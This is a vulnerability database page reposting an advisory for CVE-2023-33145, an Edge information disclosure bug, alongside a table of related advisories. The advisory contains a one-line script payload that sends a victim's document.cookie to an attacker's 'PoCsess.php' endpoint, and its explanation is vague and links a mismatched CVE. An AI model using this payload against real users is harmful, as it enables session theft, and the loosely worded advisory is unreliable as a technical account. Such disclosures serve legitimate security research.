Vulners
Lucene search
Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2023-33145 | 14 Jun 202300:15 | – | attackerkb |
 | CVE-2023-33145 | 14 Jun 202307:33 | – | circl |
 | Microsoft Edge 安全漏洞 | 13 Jun 202300:00 | – | cnnvd |
 | CVE-2023-33145 | 13 Jun 202323:26 | – | cve |
 | CVE-2023-33145 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | 13 Jun 202323:26 | – | cvelist |
 | EUVD-2023-37330 | 3 Oct 202520:07 | – | euvd |
 | GLSA-202402-05 : Microsoft Edge: Multiple Vulnerabilities | 3 Feb 202400:00 | – | nessus |
| Microsoft Edge (Chromium) < 114.0.1823.41 Multiple Vulnerabilities | 7 Jun 202300:00 | – | nessus |
 | Microsoft Edge: Multiple Vulnerabilities | 3 Feb 202400:00 | – | gentoo |
 | KLA50321 OSI vulnerability in Microsoft Browser | 13 Jun 202300:00 | – | kaspersky |
10
## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
## Author: nu11secur1ty
## Date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
## Reference: https://portswigger.net/web-security/information-disclosure,
https://www.softwaresecured.com/stride-threat-modeling/
## CVE-2023-33145
## Description:
The type of information that could be disclosed if an attacker
successfully exploited this vulnerability is data inside the targeted
website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
sensitive information.
The user would have to click on a specially crafted URL to be
compromised by the attacker.
In this example, the attacker use STRIDE Threat Modeling to spoof the
victim to click on his website and done.
This will be hard to detect.
## Conclusion:
Please be careful, for suspicious sites or be careful who sending you
an link to open!
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```js
## This is a Get request from the server when the victims click! And
it is enough to understand this vulnerability! =)
<script> var i = new Image();
i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
## WARNING: The PoCsess.php will be not uploaded for security reasons!
## BR nu11secur1ty
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
## Time spend:
01:30:00Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.5
EPSS0.07436